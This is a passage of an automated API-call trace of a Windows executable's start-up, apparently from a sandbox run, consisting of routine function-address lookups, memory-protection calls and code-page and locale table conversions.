(hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0299.030] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0299.032] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0299.032] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0299.033] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0299.034] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0299.034] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0299.034] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0299.034] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0299.034] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0299.034] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0299.035] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0299.035] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0299.035] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0299.035] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0299.035] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0299.036] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0299.036] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0299.090] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0299.090] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0299.091] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0299.091] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0299.091] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0299.092] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0299.092] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74730000 [0299.092] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoW") returned 0x74731580 [0299.092] GetProcAddress (hModule=0x74730000, lpProcName="VerQueryValueW") returned 0x74731500 [0299.092] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoSizeW") returned 0x74731560 [0299.092] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0299.092] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0299.093] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5fc34d1c, dwHighDateTime=0x1d45ac6)) [0299.093] GetCurrentThreadId () returned 0xcb8 [0299.093] GetCurrentProcessId () returned 0xcb4 [0299.093] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34655526321) returned 1 [0299.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0299.093] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0299.093] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0299.093] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0299.093] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0299.093] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0299.093] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0299.094] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0299.095] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0299.096] GetCurrentThreadId () returned 0xcb8 [0299.096] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x4fb64a23, hStdError=0x475810)) [0299.096] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0299.096] GetFileType (hFile=0x38) returned 0x2 [0299.096] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0299.096] GetFileType (hFile=0xc0) returned 0x3 [0299.096] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0299.096] GetFileType (hFile=0x40) returned 0x2 [0299.096] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner" [0299.096] GetEnvironmentStringsW () returned 0x671f70* [0299.096] FreeEnvironmentStringsW (penv=0x671f70) returned 1 [0299.096] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0299.097] GetLastError () returned 0x0 [0299.097] SetLastError (dwErrCode=0x0) [0299.097] GetLastError () returned 0x0 [0299.097] SetLastError (dwErrCode=0x0) [0299.097] GetLastError () returned 0x0 [0299.097] SetLastError (dwErrCode=0x0) [0299.097] GetACP () returned 0x4e4 [0299.097] GetLastError () returned 0x0 [0299.097] SetLastError (dwErrCode=0x0) [0299.097] IsValidCodePage (CodePage=0x4e4) returned 1 [0299.097] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0299.097] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0299.098] GetLastError () returned 0x0 [0299.098] SetLastError (dwErrCode=0x0) [0299.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0299.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0299.098] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0299.098] GetLastError () returned 0x0 [0299.098] SetLastError (dwErrCode=0x0) [0299.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0299.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0299.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0299.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0299.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xb3\x4b\xb6\x4f\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0299.098] GetLastError () returned 0x0 [0299.098] SetLastError (dwErrCode=0x0) [0299.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0299.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0299.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0299.098] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0299.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 